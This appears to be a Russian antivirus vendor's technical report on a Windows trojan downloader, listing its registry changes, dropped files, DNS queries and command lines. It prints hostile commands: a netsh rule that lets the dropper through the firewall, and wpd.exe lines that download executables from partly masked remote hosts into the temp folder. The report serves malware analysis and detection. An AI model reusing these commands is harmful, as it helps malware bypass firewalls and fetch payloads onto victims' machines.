Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%TEMP%\wpd.exe' = '%TEMP%\wpd.exe:*:Enabled:wpd'
- '%TEMP%\LV_b662.exe' (загружен из сети Интернет)
- '%TEMP%\wpd.exe' -url="http://xz.###dsj.com.cn/dw/<Имя вируса>.32.exe" -param="" -s -local_dir="%TEMP%\"
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' http://up.###dsj.com.cn/soft/tj/inst.asp?us#############################
- '%TEMP%\LV_b662.exe'
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "%TEMP%\wpd.exe" wpd ENABLE
- '%TEMP%\wpd.exe' -url="http://www.do###ivip.com/user/b662/LV_b662.exe" -param="" -s -local_dir="%TEMP%\"
- '%TEMP%\wpd.exe' -url="http://xz.###dsj.com.cn/dw/05/sb662.exe" -param="" -s -local_dir="%TEMP%\"
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\inst[1].asp
- %TEMP%\LV_b662.exe.dt!
- %TEMP%\wpd.exe
- %TEMP%\LV_b662.exe.dt! в %TEMP%\LV_b662.exe
- 'up.###dsj.com.cn':80
- 'localhost':1044
- 'www.do###ivip.com':80
- http://up.###dsj.com.cn/soft/tj/inst.asp?us#############################
- http://www.do###ivip.com/user/b662/LV_b662.exe
- DNS ASK up.###dsj.com.cn
- DNS ASK xz.###dsj.com.cn
- DNS ASK www.do###ivip.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''